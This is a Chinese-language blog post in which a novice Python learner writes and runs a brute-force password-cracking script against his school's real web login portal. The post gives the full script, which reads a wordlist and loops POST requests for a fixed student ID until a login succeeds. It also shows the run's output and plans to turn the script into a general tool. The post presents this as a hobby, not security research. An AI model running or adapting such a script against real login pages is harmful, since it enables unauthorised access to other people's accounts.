Python零基础到编写网页brute force cracking script

二级考完了,成绩还没有出现,现在每个星期7节课,我纳闷了,课程能否安排多一点嘛。别水得太明显了,否则我都不好意思在高中同学面前说我们课有好“多”,有好“忙”了。

何以解忧,唯有上网!准备用python写个暴力破解学校数字话校园的脚本,(注:三天前开始看<python入门.doc>),粗略了看了一下数据类型和各种程序结构的语法for啊,if , elif ,else 之类的。 python现在的稳定版有两个2.6.1和3.0.1。听说后者改进了很多东西,比如去掉了urllib2,统一到urllib中。正是python的改进如此的迅速造成了我google出来的源码很多都运行不起了。

#tunpishuang at gmail dot com
#2009.4.1
#dc_crack.py 0.0.1
import urllib.request
import urllib.parse
fsock=open(‘pass.txt’,’r’)
for i in range(1,10000000):
pw=fsock.readline(7)
params = urllib.parse.urlencode({"tbUserNo": 20720310307, "tbPW": pw})
f = urllib.request.urlopen("http://dc.cqit.edu.cn/userlogin.aspx", params)
flag=str(f.read(9))
if(flag == "b’ <script>t’"):
print("login ok!")
print("the true password is: %s" %pw)
break
else:
print("flag:%s ,password:< %s> wrong !trying next password…\n" % (flag,pw))

通过http.client.HTTPResponse这个实例的类文件对象的read(9)方法来判断,开始无论密码正确否都返回error!,后来在Google论坛comp.lang.python发了个帖子,某老外热情的解答了我等小菜的疑问,甚感激。原来是python3.x默认用的unicode,但是http返回的是bytes,需要通过str()转换一下,大概就是这样吧。最后把自己的密码改成一个稍微靠前点的0000010测试了一下:

flag:b’ a’ ,password:<0000000> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000001> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000002> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000003> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000004> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000005> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000006> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000007> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000008> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

flag:b’ a’ ,password:<0000009> wrong !trying next password…

flag:b’ a’ ,password:<

wrong !trying next password…

login ok!

the true password is: 0000010

破完收工~下一步准备完善一下:词典直接放内存,通过参数支持get,post和自定义action页面,自定义发送输入….etc…..

“Python零基础到编写网页brute force cracking script”的3个回复

发表评论

电子邮件地址不会被公开。 必填项已用*标注